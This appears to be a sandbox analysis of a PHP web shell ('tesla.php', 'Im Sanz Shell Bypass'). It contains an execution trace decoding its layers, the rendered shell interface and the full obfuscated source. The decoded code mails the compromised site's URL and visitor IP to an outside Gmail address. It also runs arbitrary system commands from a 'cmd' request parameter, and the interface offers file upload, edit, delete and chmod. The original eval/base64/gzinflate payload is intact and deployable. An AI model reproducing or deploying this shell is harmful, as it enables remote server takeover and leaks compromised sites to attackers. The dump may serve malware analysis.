2 62 0 0.004417 435808 str_rot13 0 /var/www/html/uploads/tesla.php 5 1 '@vav_frg(\'bhgchg_ohssrevat\', 0); @vav_frg(\'qvfcynl_reebef\', 0); frg_gvzr_yvzvg(0); vav_frg(\'zrzbel_yvzvg\', \'64Z\'); urnqre(\'Pbagrag-Glcr: grkg/ugzy; punefrg=HGS-8\'); $ghwhnaznvy = \'sngbanuanfvnu@tznvy.pbz\'; $k_cngu = "uggc://" . $_FREIRE[\'FREIRE_ANZR\'] . $_FREIRE[\'ERDHRFG_HEV\']; $crfna_nyreg = "svk $k_cngu :c *VC Nqqerff : [ " . $_FREIRE[\'ERZBGR_NQQE\'] . " ]"; znvy($ghwhnaznvy, "YBTTRE", $crfna_nyreg, "[ " . $_FREIRE[\'ERZBGR_NQQE\'] . " ]");'
2 62 1 0.004443 436352
2 62 R '@ini_set(\'output_buffering\', 0); @ini_set(\'display_errors\', 0); set_time_limit(0); ini_set(\'memory_limit\', \'64M\'); header(\'Content-Type: text/html; charset=UTF-8\'); $tujuanmail = \'fatonahnasiah@gmail.com\'; $x_path = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\']; $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]"; mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");'
2 63 0 0.004499 424056 eval 1 '@ini_set(\'output_buffering\', 0); @ini_set(\'display_errors\', 0); set_time_limit(0); ini_set(\'memory_limit\', \'64M\'); header(\'Content-Type: text/html; charset=UTF-8\'); $tujuanmail = \'fatonahnasiah@gmail.com\'; $x_path = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\']; $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]"; mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");' /var/www/html/uploads/tesla.php 5 0
3 64 0 0.004525 424056 ini_set 0 /var/www/html/uploads/tesla.php(5) : eval()'d code 1 2 'output_buffering' 0
3 64 1 0.004541 424128
3 64 R FALSE
3 65 0 0.004555 424056 ini_set 0 /var/www/html/uploads/tesla.php(5) : eval()'d code 1 2 'display_errors' 0
3 65 1 0.004574 424128
3 65 R ''
3 66 0 0.004589 424056 set_time_limit 0 /var/www/html/uploads/tesla.php(5) : eval()'d code 1 1 0
3 66 1 0.004604 424120
3 66 R FALSE
3 67 0 0.004617 424088 ini_set 0 /var/www/html/uploads/tesla.php(5) : eval()'d code 1 2 'memory_limit' '64M'
3 67 1 0.004635 424192
3 67 R '128M'
3 68 0 0.004651 424088 header 0 /var/www/html/uploads/tesla.php(5) : eval()'d code 1 1 'Content-Type: text/html; charset=UTF-8'
3 68 1 0.004671 424120
3 68 R NULL
2 A /var/www/html/uploads/tesla.php(5) : eval()'d code 1 $tujuanmail = 'fatonahnasiah@gmail.com'
2 A /var/www/html/uploads/tesla.php(5) : eval()'d code 1 $x_path = 'http://localhost/uploads/tesla.php'
2 A /var/www/html/uploads/tesla.php(5) : eval()'d code 1 $pesan_alert = 'fix http://localhost/uploads/tesla.php :p *IP Address : [ 127.0.0.1 ]'
3 69 0 0.004725 424288 mail 0 /var/www/html/uploads/tesla.php(5) : eval()'d code 1 4 'fatonahnasiah@gmail.com' 'LOGGER' 'fix http://localhost/uploads/tesla.php :p *IP Address : [ 127.0.0.1 ]' '[ 127.0.0.1 ]'
3 69 1 0.005618 424432
3 69 R FALSE
2 63 1 0.005641 424248
2 70 0 0.005650 419888 base64_decode 0 /var/www/html/uploads/tesla.php 7 1 'KyvWKFhYK1fXQ4lqDWXxCGVmj0kqqCpHitXUrEkoKihaRUOyVkEtskaySUMBiivYKmCqtElVy1ZYL6rSAKkA8qDa9KH6CsuKrBV3AQ=='
2 70 1 0.005670 420080
2 70 R '++�(XX+W�C�j\re�\bef�I*�*G��ԬI(*(ZEC�VA-�F�IC\001�+�*`��IU�VX/��\000�\000���\nˊ�\025w\001'
2 71 0 0.005694 420048 str_rot13 0 /var/www/html/uploads/tesla.php 7 1 '++�(XX+W�C�j\re�\bef�I*�*G��ԬI(*(ZEC�VA-�F�IC\001�+�*`��IU�VX/��\000�\000���\nˊ�\025w\001'
2 71 1 0.005715 420192
2 71 R '++�(KK+J�P�w\rr�\brs�V*�*T��ԬV(*(MRP�IN-�S�VP\001�+�*`��VH�IK/��\000�\000���\nˊ�\025j\001'
2 72 0 0.005736 420000 gzinflate 0 /var/www/html/uploads/tesla.php 7 1 '++�(KK+J�P�w\rr�\brs�V*�*T��ԬV(*(MRP�IN-�S�VP\001�+�*`��VH�IK/��\000�\000���\nˊ�\025j\001'
2 72 1 0.005771 420192
2 72 R 'vs(vffrg($_ERDHRFG["pzq"])){ rpub "<cer>"; $pzq = ($_ERDHRFG["pzq"]); flfgrz($pzq); rpub "</cer>"; qvr; }'
2 73 0 0.005790 420048 str_rot13 0 /var/www/html/uploads/tesla.php 7 1 'vs(vffrg($_ERDHRFG["pzq"])){ rpub "<cer>"; $pzq = ($_ERDHRFG["pzq"]); flfgrz($pzq); rpub "</cer>"; qvr; }'
2 73 1 0.005809 420240
2 73 R 'if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }'
2 74 0 0.005843 421032 eval 1 'if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }' /var/www/html/uploads/tesla.php 7 0
2 74 1 0.005862 421032
1 3 1 0.005870 419616
0.005903 327344
TRACE END [2023-02-13 01:26:03.056613]
Generated HTML code
<html><head><link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
</head><body><center>
<style type="text/css">
body {
font-family: Kelly Slab;
background-color: black;
color: lime;
}
#content tr:hover{
background-color: grey;
text-shadow:0px 0px 10px #000000;
}
#content .first{
color: #000000;
background-image:url(#);
}
#content .first:hover{
background-color: grey;
text-shadow:0px 0px 1px #339900;
}
table, th, td {
border-collapse:collapse;
padding: 5px;
color: lime;
}
.table_home, .th_home, .td_home {
color: lime;
border: 2px solid grey;
padding: 7px;
}
a{
font-size: 19px;
color: #00ff00;
text-decoration: none;
}
a:hover{
color: white;
text-shadow:0px 0px 10px #339900;
}
input,select,textarea{
border: 1px #ffffff solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
.close {
overflow: auto;
border: 1px solid lime;
background: lime;
color: white;
}
.r {
float: right;
text-align: right;
}
</style>
<a href="?"><h1 style="font-family: Kelly Slab; font-size: 35px; color: white;">
Im Sanz Shell Bypass </h1></a>
<table width="95%" border="0" cellpadding="0" cellspacing="0" align="left">
<tbody><tr><td></td></tr><tr><td><font color="white">
<i class="fa fa-user"></i> </font></td><td>: <font color="lime">::1</font></td></tr><tr><td><font color="white">
<i class="fa fa-desktop"></i> </font></td><td>: <font color="lime">127.0.0.1 / localhost</font></td></tr><tr><td><font color="white">
<i class="fa fa-hdd-o"></i> </font></td><td>: <font color="lime">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</font></td></tr></tbody></table><table width="95%" border="0" cellpadding="0" cellspacing="0" align="center">
<tbody><tr align="center"><td align="center"><br><i class="fa fa-folder-o"></i> : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/<br><br><br><font color="lime"></font><form enctype="multipart/form-data" method="POST"><font color="lime">
Upload File: <input type="file" name="file" style="color:lime;border:2px solid lime;" required=""></font>
<input type="submit" value="UPLOAD" style="margin-top:4px;width:100px;height:27px;font-family:Kelly Slab;font-size:15;background:black;color: lime;border:2px solid lime;border-radius:5px"></form></td></tr></tbody></table><br><center></center><div id="content"><table width="95%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<th><center>Name</center></th>
<th><center>Size</center></th>
<th><center>Perm</center></th>
<th><center>Options</center></th>
</tr>
<tr></tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td class="td_home"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html"> beneri.se_malware_analysis</a></td>
<td class="td_home"><center>0 KB</center></td>
<td class="td_home"><center>-rw-r--r--</center></td>
<td class="td_home"><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt" style="margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px">
<option value="Action">Action</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">" style="margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px">
</form></center></td>
</tr><tr>
<td class="td_home"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII="><a href="?filesrc=/var/www/html/tesla.php&path=/var/www/html"> tesla.php</a></td>
<td class="td_home"><center>5.971 KB</center></td>
<td class="td_home"><center>-rw-rw-r--</center></td>
<td class="td_home"><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt" style="margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px">
<option value="Action">Action</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="tesla.php">
<input type="hidden" name="path" value="/var/www/html/tesla.php">
<input type="submit" value=">" style="margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px">
</form></center></td>
</tr></tbody></table>
</div></center></body></html>Original PHP code
<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))))
?>
<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('jY9deMIwFIb/yiEIqcOPXYwxTQTnSethcXMirCIhDckpKJlaWlP765fOIWZKuwq8z3ueZjL1wmZ6MaJSibJR/kTWtUhenOgAYfsJWS+FynjZmAO3VxVX/+BAOPrW8sa3HqMuugy0ti3U4VlPnd7f5TRjdFpySFFfC4FJ4DA7VRsD2j2OHbZaAlR0RxBZFtnb8KGb6G75TBrRGt/ABHV6sBDGCaO9ZNNGF4+OUlhQZM+lThdXxCHKazwmMIIen7P0haVbbX754zJ0Z2pSRfa8YPOML9IN3QWRtNoIYRqrsLPVfn+RxxJhNkKwrCpytYYYtkD+uPJMxvhltVe/txDYkQS6M6NfPxkAbJ+t1ywlg6toIf+PsJ98AQ==')))))?>
<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('KyvWKFhYK1fXQ4lqDWXxCGVmj0kqqCpHitXUrEkoKihaRUOyVkEtskaySUMBiivYKmCqtElVy1ZYL6rSAKkA8qDa9KH6CsuKrBV3AQ==')))))?>